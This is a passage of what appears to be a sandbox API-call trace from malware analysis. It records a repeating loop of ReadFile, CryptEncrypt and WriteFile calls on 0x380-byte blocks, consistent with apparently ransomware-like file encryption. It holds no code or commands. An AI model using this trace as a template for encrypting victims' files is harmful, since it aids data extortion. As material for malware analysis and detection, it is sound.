nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.673] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.673] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.674] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.674] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.675] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.675] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.676] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.676] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.677] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.677] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.678] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.678] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.678] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.679] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.680] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.681] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 